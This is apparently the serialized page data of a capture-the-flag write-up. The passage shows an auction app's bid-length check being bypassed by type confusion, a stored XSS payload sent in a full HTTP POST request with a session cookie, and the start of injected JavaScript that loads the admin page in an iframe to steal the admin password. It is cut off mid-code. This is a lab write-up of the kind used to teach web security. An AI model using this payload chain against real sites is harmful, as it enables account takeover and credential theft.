isAuthenticated",{"type":34,"tag":315,"props":1253,"children":1254},{"style":338},[1255],{"type":39,"value":372},{"type":34,"tag":315,"props":1257,"children":1258},{"style":384},[1259],{"type":39,"value":387},{"type":34,"tag":315,"props":1261,"children":1262},{"style":338},[1263],{"type":39,"value":392},{"type":34,"tag":315,"props":1265,"children":1266},{"style":332},[1267],{"type":39,"value":397},{"type":34,"tag":315,"props":1269,"children":1270},{"style":338},[1271],{"type":39,"value":372},{"type":34,"tag":315,"props":1273,"children":1274},{"style":332},[1275],{"type":39,"value":406},{"type":34,"tag":315,"props":1277,"children":1278},{"style":338},[1279],{"type":39,"value":177},{"type":34,"tag":315,"props":1281,"children":1282},{"style":338},[1283],{"type":39,"value":415},{"type":34,"tag":315,"props":1285,"children":1286},{"style":338},[1287],{"type":39,"value":420},{"type":34,"tag":315,"props":1289,"children":1290},{"class":317,"line":328},[1291,1295],{"type":34,"tag":315,"props":1292,"children":1293},{"style":475},[1294],{"type":39,"value":478},{"type":34,"tag":315,"props":1296,"children":1297},{"style":338},[1298],{"type":39,"value":420},{"type":34,"tag":315,"props":1300,"children":1301},{"class":317,"line":423},[1302,1306,1311,1315,1319,1323,1328,1332,1337],{"type":34,"tag":315,"props":1303,"children":1304},{"style":384},[1305],{"type":39,"value":491},{"type":34,"tag":315,"props":1307,"children":1308},{"style":332},[1309],{"type":39,"value":1310}," 
auctionId",{"type":34,"tag":315,"props":1312,"children":1313},{"style":338},[1314],{"type":39,"value":449},{"type":34,"tag":315,"props":1316,"children":1317},{"style":332},[1318],{"type":39,"value":454},{"type":34,"tag":315,"props":1320,"children":1321},{"style":338},[1322],{"type":39,"value":66},{"type":34,"tag":315,"props":1324,"children":1325},{"style":332},[1326],{"type":39,"value":1327},"params",{"type":34,"tag":315,"props":1329,"children":1330},{"style":338},[1331],{"type":39,"value":66},{"type":34,"tag":315,"props":1333,"children":1334},{"style":332},[1335],{"type":39,"value":1336},"id",{"type":34,"tag":315,"props":1338,"children":1339},{"style":338},[1340],{"type":39,"value":468},{"type":34,"tag":315,"props":1342,"children":1343},{"class":317,"line":471},[1344,1348,1353,1357,1361,1365,1370,1374,1379],{"type":34,"tag":315,"props":1345,"children":1346},{"style":384},[1347],{"type":39,"value":491},{"type":34,"tag":315,"props":1349,"children":1350},{"style":332},[1351],{"type":39,"value":1352}," 
userId",{"type":34,"tag":315,"props":1354,"children":1355},{"style":338},[1356],{"type":39,"value":449},{"type":34,"tag":315,"props":1358,"children":1359},{"style":332},[1360],{"type":39,"value":454},{"type":34,"tag":315,"props":1362,"children":1363},{"style":338},[1364],{"type":39,"value":66},{"type":34,"tag":315,"props":1366,"children":1367},{"style":332},[1368],{"type":39,"value":1369},"session",{"type":34,"tag":315,"props":1371,"children":1372},{"style":338},[1373],{"type":39,"value":66},{"type":34,"tag":315,"props":1375,"children":1376},{"style":332},[1377],{"type":39,"value":1378},"userId",{"type":34,"tag":315,"props":1380,"children":1381},{"style":338},[1382],{"type":39,"value":468},{"type":34,"tag":315,"props":1384,"children":1385},{"class":317,"line":485},[1386,1390,1394,1399,1403,1407,1411,1415,1419],{"type":34,"tag":315,"props":1387,"children":1388},{"style":384},[1389],{"type":39,"value":491},{"type":34,"tag":315,"props":1391,"children":1392},{"style":338},[1393],{"type":39,"value":434},{"type":34,"tag":315,"props":1395,"children":1396},{"style":332},[1397],{"type":39,"value":1398}," 
bid",{"type":34,"tag":315,"props":1400,"children":1401},{"style":338},[1402],{"type":39,"value":444},{"type":34,"tag":315,"props":1404,"children":1405},{"style":338},[1406],{"type":39,"value":449},{"type":34,"tag":315,"props":1408,"children":1409},{"style":332},[1410],{"type":39,"value":454},{"type":34,"tag":315,"props":1412,"children":1413},{"style":338},[1414],{"type":39,"value":66},{"type":34,"tag":315,"props":1416,"children":1417},{"style":332},[1418],{"type":39,"value":463},{"type":34,"tag":315,"props":1420,"children":1421},{"style":338},[1422],{"type":39,"value":468},{"type":34,"tag":315,"props":1424,"children":1425},{"class":317,"line":541},[1426],{"type":34,"tag":315,"props":1427,"children":1428},{"emptyLinePlaceholder":545},[1429],{"type":39,"value":548},{"type":34,"tag":315,"props":1431,"children":1432},{"class":317,"line":551},[1433,1438,1442,1447,1451,1456,1461,1467,1471,1475],{"type":34,"tag":315,"props":1434,"children":1435},{"style":475},[1436],{"type":39,"value":1437},"    if",{"type":34,"tag":315,"props":1439,"children":1440},{"style":338},[1441],{"type":39,"value":392},{"type":34,"tag":315,"props":1443,"children":1444},{"style":332},[1445],{"type":39,"value":1446},"bid",{"type":34,"tag":315,"props":1448,"children":1449},{"style":338},[1450],{"type":39,"value":66},{"type":34,"tag":315,"props":1452,"children":1453},{"style":642},[1454],{"type":39,"value":1455},"length",{"type":34,"tag":315,"props":1457,"children":1458},{"style":338},[1459],{"type":39,"value":1460}," >",{"type":34,"tag":315,"props":1462,"children":1464},{"style":1463},"--shiki-default:#4C9A91",[1465],{"type":39,"value":1466}," 10",{"type":34,"tag":315,"props":1468,"children":1469},{"style":338},[1470],{"type":39,"value":177},{"type":34,"tag":315,"props":1472,"children":1473},{"style":338},[1474],{"type":39,"value":434},{"type":34,"tag":315,"props":1476,"children":1477},{"style":322},[1478],{"type":39,"value":1479}," // \u003C-- CHECK THE 
LENGTH\n",{"type":34,"tag":315,"props":1481,"children":1482},{"class":317,"line":570},[1483,1488,1492,1496,1501,1505,1510,1515,1519,1523,1527,1531,1536,1540,1545,1549,1554,1559,1563],{"type":34,"tag":315,"props":1484,"children":1485},{"style":475},[1486],{"type":39,"value":1487},"      return",{"type":34,"tag":315,"props":1489,"children":1490},{"style":332},[1491],{"type":39,"value":406},{"type":34,"tag":315,"props":1493,"children":1494},{"style":338},[1495],{"type":39,"value":66},{"type":34,"tag":315,"props":1497,"children":1498},{"style":343},[1499],{"type":39,"value":1500},"status",{"type":34,"tag":315,"props":1502,"children":1503},{"style":338},[1504],{"type":39,"value":351},{"type":34,"tag":315,"props":1506,"children":1507},{"style":1463},[1508],{"type":39,"value":1509},"400",{"type":34,"tag":315,"props":1511,"children":1512},{"style":338},[1513],{"type":39,"value":1514},").",{"type":34,"tag":315,"props":1516,"children":1517},{"style":343},[1518],{"type":39,"value":634},{"type":34,"tag":315,"props":1520,"children":1521},{"style":338},[1522],{"type":39,"value":639},{"type":34,"tag":315,"props":1524,"children":1525},{"style":642},[1526],{"type":39,"value":645},{"type":34,"tag":315,"props":1528,"children":1529},{"style":338},[1530],{"type":39,"value":650},{"type":34,"tag":315,"props":1532,"children":1533},{"style":475},[1534],{"type":39,"value":1535}," false",{"type":34,"tag":315,"props":1537,"children":1538},{"style":338},[1539],{"type":39,"value":372},{"type":34,"tag":315,"props":1541,"children":1542},{"style":642},[1543],{"type":39,"value":1544}," message",{"type":34,"tag":315,"props":1546,"children":1547},{"style":338},[1548],{"type":39,"value":650},{"type":34,"tag":315,"props":1550,"children":1551},{"style":354},[1552],{"type":39,"value":1553}," '",{"type":34,"tag":315,"props":1555,"children":1556},{"style":360},[1557],{"type":39,"value":1558},"Too 
long",{"type":34,"tag":315,"props":1560,"children":1561},{"style":354},[1562],{"type":39,"value":852},{"type":34,"tag":315,"props":1564,"children":1565},{"style":338},[1566],{"type":39,"value":668},{"type":34,"tag":315,"props":1568,"children":1569},{"class":317,"line":578},[1570],{"type":34,"tag":315,"props":1571,"children":1572},{"style":338},[1573],{"type":39,"value":1574},"    }\n",{"type":34,"tag":315,"props":1576,"children":1577},{"class":317,"line":619},[1578,1583,1588,1592,1597,1601,1605,1609,1613],{"type":34,"tag":315,"props":1579,"children":1580},{"style":475},[1581],{"type":39,"value":1582},"    await",{"type":34,"tag":315,"props":1584,"children":1585},{"style":343},[1586],{"type":39,"value":1587}," placeBid",{"type":34,"tag":315,"props":1589,"children":1590},{"style":338},[1591],{"type":39,"value":351},{"type":34,"tag":315,"props":1593,"children":1594},{"style":332},[1595],{"type":39,"value":1596},"auctionId",{"type":34,"tag":315,"props":1598,"children":1599},{"style":338},[1600],{"type":39,"value":372},{"type":34,"tag":315,"props":1602,"children":1603},{"style":332},[1604],{"type":39,"value":1352},{"type":34,"tag":315,"props":1606,"children":1607},{"style":338},[1608],{"type":39,"value":372},{"type":34,"tag":315,"props":1610,"children":1611},{"style":332},[1612],{"type":39,"value":1398},{"type":34,"tag":315,"props":1614,"children":1615},{"style":338},[1616],{"type":39,"value":616},{"type":34,"tag":315,"props":1618,"children":1619},{"class":317,"line":671},[1620,1625,1629,1633,1637,1641,1645,1649,1653],{"type":34,"tag":315,"props":1621,"children":1622},{"style":475},[1623],{"type":39,"value":1624},"    
return",{"type":34,"tag":315,"props":1626,"children":1627},{"style":332},[1628],{"type":39,"value":406},{"type":34,"tag":315,"props":1630,"children":1631},{"style":338},[1632],{"type":39,"value":66},{"type":34,"tag":315,"props":1634,"children":1635},{"style":343},[1636],{"type":39,"value":634},{"type":34,"tag":315,"props":1638,"children":1639},{"style":338},[1640],{"type":39,"value":639},{"type":34,"tag":315,"props":1642,"children":1643},{"style":642},[1644],{"type":39,"value":645},{"type":34,"tag":315,"props":1646,"children":1647},{"style":338},[1648],{"type":39,"value":650},{"type":34,"tag":315,"props":1650,"children":1651},{"style":475},[1652],{"type":39,"value":655},{"type":34,"tag":315,"props":1654,"children":1655},{"style":338},[1656],{"type":39,"value":668},{"type":34,"tag":315,"props":1658,"children":1659},{"class":317,"line":680},[1660,1665,1670,1674,1679,1683],{"type":34,"tag":315,"props":1661,"children":1662},{"style":338},[1663],{"type":39,"value":1664},"  }",{"type":34,"tag":315,"props":1666,"children":1667},{"style":475},[1668],{"type":39,"value":1669}," catch",{"type":34,"tag":315,"props":1671,"children":1672},{"style":338},[1673],{"type":39,"value":392},{"type":34,"tag":315,"props":1675,"children":1676},{"style":332},[1677],{"type":39,"value":1678},"err",{"type":34,"tag":315,"props":1680,"children":1681},{"style":338},[1682],{"type":39,"value":177},{"type":34,"tag":315,"props":1684,"children":1685},{"style":338},[1686],{"type":39,"value":420},{"type":34,"tag":315,"props":1688,"children":1689},{"class":317,"line":697},[1690,1695,1699,1704,1708,1712,1717,1721,1725,1730],{"type":34,"tag":315,"props":1691,"children":1692},{"style":332},[1693],{"type":39,"value":1694},"    
console",{"type":34,"tag":315,"props":1696,"children":1697},{"style":338},[1698],{"type":39,"value":66},{"type":34,"tag":315,"props":1700,"children":1701},{"style":343},[1702],{"type":39,"value":1703},"error",{"type":34,"tag":315,"props":1705,"children":1706},{"style":338},[1707],{"type":39,"value":351},{"type":34,"tag":315,"props":1709,"children":1710},{"style":354},[1711],{"type":39,"value":852},{"type":34,"tag":315,"props":1713,"children":1714},{"style":360},[1715],{"type":39,"value":1716},"Error placing bid:",{"type":34,"tag":315,"props":1718,"children":1719},{"style":354},[1720],{"type":39,"value":852},{"type":34,"tag":315,"props":1722,"children":1723},{"style":338},[1724],{"type":39,"value":372},{"type":34,"tag":315,"props":1726,"children":1727},{"style":332},[1728],{"type":39,"value":1729}," err",{"type":34,"tag":315,"props":1731,"children":1732},{"style":338},[1733],{"type":39,"value":616},{"type":34,"tag":315,"props":1735,"children":1736},{"class":317,"line":707},[1737,1741,1746,1750,1754,1758,1763,1767,1772,1776,1780,1785,1789,1793,1798],{"type":34,"tag":315,"props":1738,"children":1739},{"style":384},[1740],{"type":39,"value":491},{"type":34,"tag":315,"props":1742,"children":1743},{"style":332},[1744],{"type":39,"value":1745}," 
status",{"type":34,"tag":315,"props":1747,"children":1748},{"style":338},[1749],{"type":39,"value":449},{"type":34,"tag":315,"props":1751,"children":1752},{"style":332},[1753],{"type":39,"value":1729},{"type":34,"tag":315,"props":1755,"children":1756},{"style":338},[1757],{"type":39,"value":66},{"type":34,"tag":315,"props":1759,"children":1760},{"style":332},[1761],{"type":39,"value":1762},"message",{"type":34,"tag":315,"props":1764,"children":1765},{"style":338},[1766],{"type":39,"value":66},{"type":34,"tag":315,"props":1768,"children":1769},{"style":343},[1770],{"type":39,"value":1771},"includes",{"type":34,"tag":315,"props":1773,"children":1774},{"style":338},[1775],{"type":39,"value":351},{"type":34,"tag":315,"props":1777,"children":1778},{"style":354},[1779],{"type":39,"value":852},{"type":34,"tag":315,"props":1781,"children":1782},{"style":360},[1783],{"type":39,"value":1784},"Invalid",{"type":34,"tag":315,"props":1786,"children":1787},{"style":354},[1788],{"type":39,"value":852},{"type":34,"tag":315,"props":1790,"children":1791},{"style":338},[1792],{"type":39,"value":177},{"type":34,"tag":315,"props":1794,"children":1795},{"style":384},[1796],{"type":39,"value":1797}," ?",{"type":34,"tag":315,"props":1799,"children":1800},{"style":1463},[1801],{"type":39,"value":1802}," 400\n",{"type":34,"tag":315,"props":1804,"children":1806},{"class":317,"line":1805},15,[1807,1812,1816,1820,1824,1828,1832,1836,1840,1844,1849,1853,1857,1862,1866,1870,1874,1878,1882,1886,1890,1895,1899,1904,1908],{"type":34,"tag":315,"props":1808,"children":1809},{"style":384},[1810],{"type":39,"value":1811},"                  
:",{"type":34,"tag":315,"props":1813,"children":1814},{"style":338},[1815],{"type":39,"value":392},{"type":34,"tag":315,"props":1817,"children":1818},{"style":332},[1819],{"type":39,"value":1678},{"type":34,"tag":315,"props":1821,"children":1822},{"style":338},[1823],{"type":39,"value":66},{"type":34,"tag":315,"props":1825,"children":1826},{"style":332},[1827],{"type":39,"value":1762},{"type":34,"tag":315,"props":1829,"children":1830},{"style":338},[1831],{"type":39,"value":66},{"type":34,"tag":315,"props":1833,"children":1834},{"style":343},[1835],{"type":39,"value":1771},{"type":34,"tag":315,"props":1837,"children":1838},{"style":338},[1839],{"type":39,"value":351},{"type":34,"tag":315,"props":1841,"children":1842},{"style":354},[1843],{"type":39,"value":852},{"type":34,"tag":315,"props":1845,"children":1846},{"style":360},[1847],{"type":39,"value":1848},"not found",{"type":34,"tag":315,"props":1850,"children":1851},{"style":354},[1852],{"type":39,"value":852},{"type":34,"tag":315,"props":1854,"children":1855},{"style":338},[1856],{"type":39,"value":177},{"type":34,"tag":315,"props":1858,"children":1859},{"style":384},[1860],{"type":39,"value":1861}," 
||",{"type":34,"tag":315,"props":1863,"children":1864},{"style":332},[1865],{"type":39,"value":1729},{"type":34,"tag":315,"props":1867,"children":1868},{"style":338},[1869],{"type":39,"value":66},{"type":34,"tag":315,"props":1871,"children":1872},{"style":332},[1873],{"type":39,"value":1762},{"type":34,"tag":315,"props":1875,"children":1876},{"style":338},[1877],{"type":39,"value":66},{"type":34,"tag":315,"props":1879,"children":1880},{"style":343},[1881],{"type":39,"value":1771},{"type":34,"tag":315,"props":1883,"children":1884},{"style":338},[1885],{"type":39,"value":351},{"type":34,"tag":315,"props":1887,"children":1888},{"style":354},[1889],{"type":39,"value":852},{"type":34,"tag":315,"props":1891,"children":1892},{"style":360},[1893],{"type":39,"value":1894},"closed",{"type":34,"tag":315,"props":1896,"children":1897},{"style":354},[1898],{"type":39,"value":852},{"type":34,"tag":315,"props":1900,"children":1901},{"style":338},[1902],{"type":39,"value":1903},"))",{"type":34,"tag":315,"props":1905,"children":1906},{"style":384},[1907],{"type":39,"value":1797},{"type":34,"tag":315,"props":1909,"children":1910},{"style":1463},[1911],{"type":39,"value":1912}," 404\n",{"type":34,"tag":315,"props":1914,"children":1916},{"class":317,"line":1915},16,[1917,1921,1926],{"type":34,"tag":315,"props":1918,"children":1919},{"style":384},[1920],{"type":39,"value":1811},{"type":34,"tag":315,"props":1922,"children":1923},{"style":1463},[1924],{"type":39,"value":1925}," 
500",{"type":34,"tag":315,"props":1927,"children":1928},{"style":338},[1929],{"type":39,"value":468},{"type":34,"tag":315,"props":1931,"children":1933},{"class":317,"line":1932},17,[1934,1938,1942,1946,1950,1954,1958,1962,1966,1970,1974,1978,1982,1986,1990,1994,1998,2002,2006,2010,2014,2019,2023],{"type":34,"tag":315,"props":1935,"children":1936},{"style":475},[1937],{"type":39,"value":1624},{"type":34,"tag":315,"props":1939,"children":1940},{"style":332},[1941],{"type":39,"value":406},{"type":34,"tag":315,"props":1943,"children":1944},{"style":338},[1945],{"type":39,"value":66},{"type":34,"tag":315,"props":1947,"children":1948},{"style":343},[1949],{"type":39,"value":1500},{"type":34,"tag":315,"props":1951,"children":1952},{"style":338},[1953],{"type":39,"value":351},{"type":34,"tag":315,"props":1955,"children":1956},{"style":332},[1957],{"type":39,"value":1500},{"type":34,"tag":315,"props":1959,"children":1960},{"style":338},[1961],{"type":39,"value":1514},{"type":34,"tag":315,"props":1963,"children":1964},{"style":343},[1965],{"type":39,"value":634},{"type":34,"tag":315,"props":1967,"children":1968},{"style":338},[1969],{"type":39,"value":639},{"type":34,"tag":315,"props":1971,"children":1972},{"style":642},[1973],{"type":39,"value":645},{"type":34,"tag":315,"props":1975,"children":1976},{"style":338},[1977],{"type":39,"value":650},{"type":34,"tag":315,"props":1979,"children":1980},{"style":475},[1981],{"type":39,"value":1535},{"type":34,"tag":315,"props":1983,"children":1984},{"style":338},[1985],{"type":39,"value":372},{"type":34,"tag":315,"props":1987,"children":1988},{"style":642},[1989],{"type":39,"value":1544},{"type":34,"tag":315,"props":1991,"children":1992},{"style":338},[1993],{"type":39,"value":650},{"type":34,"tag":315,"props":1995,"children":1996},{"style":332},[1997],{"type":39,"value":1729},{"type":34,"tag":315,"props":1999,"children":2000},{"style":338},[2001],{"type":39,"value":66},{"type":34,"tag":315,"props":2003,"children":2004},{"style":332},
[2005],{"type":39,"value":1762},{"type":34,"tag":315,"props":2007,"children":2008},{"style":384},[2009],{"type":39,"value":1861},{"type":34,"tag":315,"props":2011,"children":2012},{"style":354},[2013],{"type":39,"value":1553},{"type":34,"tag":315,"props":2015,"children":2016},{"style":360},[2017],{"type":39,"value":2018},"Internal server error.",{"type":34,"tag":315,"props":2020,"children":2021},{"style":354},[2022],{"type":39,"value":852},{"type":34,"tag":315,"props":2024,"children":2025},{"style":338},[2026],{"type":39,"value":668},{"type":34,"tag":315,"props":2028,"children":2030},{"class":317,"line":2029},18,[2031],{"type":34,"tag":315,"props":2032,"children":2033},{"style":338},[2034],{"type":39,"value":677},{"type":34,"tag":315,"props":2036,"children":2038},{"class":317,"line":2037},19,[2039],{"type":34,"tag":315,"props":2040,"children":2041},{"style":338},[2042],{"type":39,"value":713},{"type":34,"tag":48,"props":2044,"children":2045},{},[2046],{"type":39,"value":2047},"However, we can see in the code that no type checking is performed. 
It is therefore entirely possible to submit a JSON object with a length element less than 10 to pass this check:",{"type":34,"tag":301,"props":2049,"children":2050},{"lang":634},[2051],{"type":34,"tag":306,"props":2052,"children":2055},{"className":2053,"code":2054,"language":634,"meta":7,"style":7},"language-json shiki shiki-themes vitesse-dark","{\"bid\":{\"length\":1,\"o\":\"a'>\u003Cimg src=x onerror=alert(1)>\"}}\n",[2056],{"type":34,"tag":59,"props":2057,"children":2058},{"__ignoreMap":7},[2059],{"type":34,"tag":315,"props":2060,"children":2061},{"class":317,"line":318},[2062,2067,2072,2076,2080,2085,2089,2093,2097,2101,2106,2110,2114,2119,2123,2127,2131,2136,2140],{"type":34,"tag":315,"props":2063,"children":2064},{"style":338},[2065],{"type":39,"value":2066},"{",{"type":34,"tag":315,"props":2068,"children":2070},{"style":2069},"--shiki-default:#B8A96577",[2071],{"type":39,"value":357},{"type":34,"tag":315,"props":2073,"children":2074},{"style":642},[2075],{"type":39,"value":1446},{"type":34,"tag":315,"props":2077,"children":2078},{"style":2069},[2079],{"type":39,"value":357},{"type":34,"tag":315,"props":2081,"children":2082},{"style":338},[2083],{"type":39,"value":2084},":{",{"type":34,"tag":315,"props":2086,"children":2087},{"style":2069},[2088],{"type":39,"value":357},{"type":34,"tag":315,"props":2090,"children":2091},{"style":642},[2092],{"type":39,"value":1455},{"type":34,"tag":315,"props":2094,"children":2095},{"style":2069},[2096],{"type":39,"value":357},{"type":34,"tag":315,"props":2098,"children":2099},{"style":338},[2100],{"type":39,"value":650},{"type":34,"tag":315,"props":2102,"children":2103},{"style":1463},[2104],{"type":39,"value":2105},"1",{"type":34,"tag":315,"props":2107,"children":2108},{"style":338},[2109],{"type":39,"value":372},{"type":34,"tag":315,"props":2111,"children":2112},{"style":2069},[2113],{"type":39,"value":357},{"type":34,"tag":315,"props":2115,"children":2116},{"style":642},[2117],{"type":39,"value":2118},"o",{"type":34,"tag
":315,"props":2120,"children":2121},{"style":2069},[2122],{"type":39,"value":357},{"type":34,"tag":315,"props":2124,"children":2125},{"style":338},[2126],{"type":39,"value":650},{"type":34,"tag":315,"props":2128,"children":2129},{"style":354},[2130],{"type":39,"value":357},{"type":34,"tag":315,"props":2132,"children":2133},{"style":360},[2134],{"type":39,"value":2135},"a'>\u003Cimg src=x onerror=alert(1)>",{"type":34,"tag":315,"props":2137,"children":2138},{"style":354},[2139],{"type":39,"value":357},{"type":34,"tag":315,"props":2141,"children":2142},{"style":338},[2143],{"type":39,"value":2144},"}}\n",{"type":34,"tag":48,"props":2146,"children":2147},{},[2148,2150,2155],{"type":39,"value":2149},"Additionally, in the template part that contains the injection, the dump keyword will convert the object we provide to a string which will then be passed to safe. This means that we can inject a JSON object with a length of 1 and an XSS payload in the ",{"type":34,"tag":59,"props":2151,"children":2153},{"className":2152},[],[2154],{"type":39,"value":2118},{"type":39,"value":2156}," field.",{"type":34,"tag":301,"props":2158,"children":2160},{"lang":2159},"http",[2161],{"type":34,"tag":306,"props":2162,"children":2165},{"className":2163,"code":2164,"language":2159,"meta":7,"style":7},"language-http shiki shiki-themes vitesse-dark","POST /api/auctions/1/bids HTTP/1.1\nHost: localhost:1337\nContent-Type: application/json\nContent-Length: 58\nCookie: connect.sid=s%3Ax4FJPG0GiAqVrYpH8ASKbI918wBmEvWK.us61E3liqERw6yg23%2FzUcPRMpqUNW6gk3kgbTTJsK2s\n\n{\"bid\":{\"length\":1,\"o\":\"a'>\u003Cimg src=x 
onerror=alert(1)>\"}}\n",[2166],{"type":34,"tag":59,"props":2167,"children":2168},{"__ignoreMap":7},[2169,2197,2210,2223,2236,2249,2256],{"type":34,"tag":315,"props":2170,"children":2171},{"class":317,"line":318},[2172,2177,2182,2187,2192],{"type":34,"tag":315,"props":2173,"children":2174},{"style":475},[2175],{"type":39,"value":2176},"POST",{"type":34,"tag":315,"props":2178,"children":2179},{"style":701},[2180],{"type":39,"value":2181}," /api/auctions/1/bids ",{"type":34,"tag":315,"props":2183,"children":2184},{"style":475},[2185],{"type":39,"value":2186},"HTTP",{"type":34,"tag":315,"props":2188,"children":2189},{"style":701},[2190],{"type":39,"value":2191},"/",{"type":34,"tag":315,"props":2193,"children":2194},{"style":1463},[2195],{"type":39,"value":2196},"1.1\n",{"type":34,"tag":315,"props":2198,"children":2199},{"class":317,"line":328},[2200,2205],{"type":34,"tag":315,"props":2201,"children":2202},{"style":475},[2203],{"type":39,"value":2204},"Host:",{"type":34,"tag":315,"props":2206,"children":2207},{"style":360},[2208],{"type":39,"value":2209}," localhost:1337\n",{"type":34,"tag":315,"props":2211,"children":2212},{"class":317,"line":423},[2213,2218],{"type":34,"tag":315,"props":2214,"children":2215},{"style":475},[2216],{"type":39,"value":2217},"Content-Type:",{"type":34,"tag":315,"props":2219,"children":2220},{"style":360},[2221],{"type":39,"value":2222}," application/json\n",{"type":34,"tag":315,"props":2224,"children":2225},{"class":317,"line":471},[2226,2231],{"type":34,"tag":315,"props":2227,"children":2228},{"style":475},[2229],{"type":39,"value":2230},"Content-Length:",{"type":34,"tag":315,"props":2232,"children":2233},{"style":360},[2234],{"type":39,"value":2235}," 
58\n",{"type":34,"tag":315,"props":2237,"children":2238},{"class":317,"line":485},[2239,2244],{"type":34,"tag":315,"props":2240,"children":2241},{"style":475},[2242],{"type":39,"value":2243},"Cookie:",{"type":34,"tag":315,"props":2245,"children":2246},{"style":360},[2247],{"type":39,"value":2248}," connect.sid=s%3Ax4FJPG0GiAqVrYpH8ASKbI918wBmEvWK.us61E3liqERw6yg23%2FzUcPRMpqUNW6gk3kgbTTJsK2s\n",{"type":34,"tag":315,"props":2250,"children":2251},{"class":317,"line":541},[2252],{"type":34,"tag":315,"props":2253,"children":2254},{"emptyLinePlaceholder":545},[2255],{"type":39,"value":548},{"type":34,"tag":315,"props":2257,"children":2258},{"class":317,"line":551},[2259,2263,2267,2271,2275,2279,2283,2287,2291,2295,2299,2303,2307,2311,2315,2319,2323,2327,2331],{"type":34,"tag":315,"props":2260,"children":2261},{"style":338},[2262],{"type":39,"value":2066},{"type":34,"tag":315,"props":2264,"children":2265},{"style":2069},[2266],{"type":39,"value":357},{"type":34,"tag":315,"props":2268,"children":2269},{"style":642},[2270],{"type":39,"value":1446},{"type":34,"tag":315,"props":2272,"children":2273},{"style":2069},[2274],{"type":39,"value":357},{"type":34,"tag":315,"props":2276,"children":2277},{"style":338},[2278],{"type":39,"value":2084},{"type":34,"tag":315,"props":2280,"children":2281},{"style":2069},[2282],{"type":39,"value":357},{"type":34,"tag":315,"props":2284,"children":2285},{"style":642},[2286],{"type":39,"value":1455},{"type":34,"tag":315,"props":2288,"children":2289},{"style":2069},[2290],{"type":39,"value":357},{"type":34,"tag":315,"props":2292,"children":2293},{"style":338},[2294],{"type":39,"value":650},{"type":34,"tag":315,"props":2296,"children":2297},{"style":1463},[2298],{"type":39,"value":2105},{"type":34,"tag":315,"props":2300,"children":2301},{"style":338},[2302],{"type":39,"value":372},{"type":34,"tag":315,"props":2304,"children":2305},{"style":2069},[2306],{"type":39,"value":357},{"type":34,"tag":315,"props":2308,"children":2309},{"style":642},[2310],
{"type":39,"value":2118},{"type":34,"tag":315,"props":2312,"children":2313},{"style":2069},[2314],{"type":39,"value":357},{"type":34,"tag":315,"props":2316,"children":2317},{"style":338},[2318],{"type":39,"value":650},{"type":34,"tag":315,"props":2320,"children":2321},{"style":354},[2322],{"type":39,"value":357},{"type":34,"tag":315,"props":2324,"children":2325},{"style":360},[2326],{"type":39,"value":2135},{"type":34,"tag":315,"props":2328,"children":2329},{"style":354},[2330],{"type":39,"value":357},{"type":34,"tag":315,"props":2332,"children":2333},{"style":338},[2334],{"type":39,"value":2144},{"type":34,"tag":48,"props":2336,"children":2337},{},[2338],{"type":39,"value":2339},"After sending the data, if we go to the auction/1 page, we can see that our XSS is successfully triggered:",{"type":34,"tag":73,"props":2341,"children":2343},{"imgSrc":2342},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743103381/writeups/aurors-archive/xss_alert.webp",[],{"type":34,"tag":48,"props":2345,"children":2346},{},[2347],{"type":39,"value":2348},"From now on, the goal is to retrieve the admin password, so we will first test our XSS payload on the admin area ourselves to calibrate the attack and make sure the payload we send to the admin actually works.",{"type":34,"tag":48,"props":2350,"children":2351},{},[2352],{"type":39,"value":2353},"I tested several approaches, notably with fetch requests, but none of them worked on my end. 
What seemed simplest at first glance was to work with an iframe: since our XSS runs on the same origin as the page that displays the users table (including the passwords), we can interact with the iframe's document however we want.",{"type":34,"tag":48,"props":2355,"children":2356},{},[2357],{"type":39,"value":2358},"We will therefore create an iframe that will render the /admin page:",{"type":34,"tag":301,"props":2360,"children":2361},{"lang":303},[2362],{"type":34,"tag":306,"props":2363,"children":2365},{"className":308,"code":2364,"language":303,"meta":7,"style":7},"let iframe = document.createElement(\"iframe\");\niframe.src = `/admin`;\niframe.width = 800;\niframe.height = 600;\ndocument.body.appendChild(iframe);\n",[2366],{"type":34,"tag":59,"props":2367,"children":2368},{"__ignoreMap":7},[2369,2421,2458,2487,2516],{"type":34,"tag":315,"props":2370,"children":2371},{"class":317,"line":318},[2372,2377,2382,2386,2391,2395,2400,2404,2408,2413,2417],{"type":34,"tag":315,"props":2373,"children":2374},{"style":384},[2375],{"type":39,"value":2376},"let",{"type":34,"tag":315,"props":2378,"children":2379},{"style":332},[2380],{"type":39,"value":2381}," iframe",{"type":34,"tag":315,"props":2383,"children":2384},{"style":338},[2385],{"type":39,"value":449},{"type":34,"tag":315,"props":2387,"children":2388},{"style":332},[2389],{"type":39,"value":2390}," 
document",{"type":34,"tag":315,"props":2392,"children":2393},{"style":338},[2394],{"type":39,"value":66},{"type":34,"tag":315,"props":2396,"children":2397},{"style":343},[2398],{"type":39,"value":2399},"createElement",{"type":34,"tag":315,"props":2401,"children":2402},{"style":338},[2403],{"type":39,"value":351},{"type":34,"tag":315,"props":2405,"children":2406},{"style":354},[2407],{"type":39,"value":357},{"type":34,"tag":315,"props":2409,"children":2410},{"style":360},[2411],{"type":39,"value":2412},"iframe",{"type":34,"tag":315,"props":2414,"children":2415},{"style":354},[2416],{"type":39,"value":357},{"type":34,"tag":315,"props":2418,"children":2419},{"style":338},[2420],{"type":39,"value":616},{"type":34,"tag":315,"props":2422,"children":2423},{"class":317,"line":328},[2424,2428,2432,2437,2441,2445,2450,2454],{"type":34,"tag":315,"props":2425,"children":2426},{"style":332},[2427],{"type":39,"value":2412},{"type":34,"tag":315,"props":2429,"children":2430},{"style":338},[2431],{"type":39,"value":66},{"type":34,"tag":315,"props":2433,"children":2434},{"style":332},[2435],{"type":39,"value":2436},"src",{"type":34,"tag":315,"props":2438,"children":2439},{"style":338},[2440],{"type":39,"value":449},{"type":34,"tag":315,"props":2442,"children":2443},{"style":354},[2444],{"type":39,"value":505},{"type":34,"tag":315,"props":2446,"children":2447},{"style":360},[2448],{"type":39,"value":2449},"/admin",{"type":34,"tag":315,"props":2451,"children":2452},{"style":354},[2453],{"type":39,"value":534},{"type":34,"tag":315,"props":2455,"children":2456},{"style":338},[2457],{"type":39,"value":468},{"type":34,"tag":315,"props":2459,"children":2460},{"class":317,"line":423},[2461,2465,2469,2474,2478,2483],{"type":34,"tag":315,"props":2462,"children":2463},{"style":332},[2464],{"type":39,"value":2412},{"type":34,"tag":315,"props":2466,"children":2467},{"style":338},[2468],{"type":39,"value":66},{"type":34,"tag":315,"props":2470,"children":2471},{"style":332